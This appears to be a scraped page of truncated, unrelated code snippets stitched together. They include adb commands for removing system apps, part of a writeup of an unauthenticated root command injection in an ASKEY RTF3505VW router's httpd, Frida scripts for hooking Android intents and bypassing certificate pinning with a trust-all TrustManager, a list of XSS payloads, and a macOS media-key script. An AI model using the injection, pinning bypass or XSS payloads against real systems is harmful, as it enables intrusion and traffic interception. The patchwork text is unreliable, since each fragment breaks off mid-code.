Get list of system apps on the device:
adb shell "echo 'apps:' && pm list packages -f | grep /system/app/ | sed 's/.*=/ - /'"
pm uninstall -k --user 0 app
Unauthenticated RCE as root on ASKEY router RTF3505VW through GET parameter | |
------------------------------------------------------------------------------ | |
The router RTF3505VW, which is distributed by Vivo, is vulnerable to a unauthenticated RCE via a GET parameter. The vulnerability resides on the /bin/httpd, as it passes a GET parameter to a system call, see the vulnerable portion of the binary below. | |
if (iVar1 != 0) { | |
system("killall ping traceroute > /dev/null 2>&1"); | |
__format = "ping %s -c %s -I %s> %s&"; | |
puVar4 = auStack10144; |
Java.perform(function () { | |
var act = Java.use("android.app.Activity"); | |
act.getIntent.overload().implementation = function () { | |
var intent = this.getIntent() | |
var cp = intent.getComponent() | |
console.log("Starting " + cp.getPackageName() + "/" + cp.getClassName()) | |
var ext = intent.getExtras(); | |
if (ext) { | |
var keys = ext.keySet() | |
var iterator = keys.iterator() |
Java.perform(function() { | |
console.log('\n[.] Cert Pinning Bypass'); | |
// Create a TrustManager that trusts everything | |
console.log('[+] Creating a TrustyTrustManager that trusts everything...'); | |
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager'); | |
var TrustyTrustManager = Java.registerClass({ | |
name: 'com.example.TrustyTrustManager', | |
implements: [X509TrustManager], | |
methods: { |
/* Remote File Include with HTML TAGS via XSS.Cx */ | |
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */ | |
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */ | |
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */ | |
/* Updated September 29, 2014 */ | |
/* RFI START */ | |
<img language=vbs src=<b onerror=alert#1/1#> | |
<isindex action="javas	cript:alert(1)" type=image> | |
"]<img src=1 onerror=alert(1)> | |
<input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span> |
#!/usr/bin/python | |
# CLI program to control the mediakeys on OS X. Used to emulate the mediakey on a keyboard with no such keys. | |
# Easiest used in combination with a launcher/trigger software such as Quicksilver. | |
# Main part taken from http://stackoverflow.com/questions/11045814/emulate-media-key-press-on-mac | |
# Glue to make it into cli program by Fredrik Wallner http://www.wallner.nu/fredrik/ | |
import Quartz | |
import sys |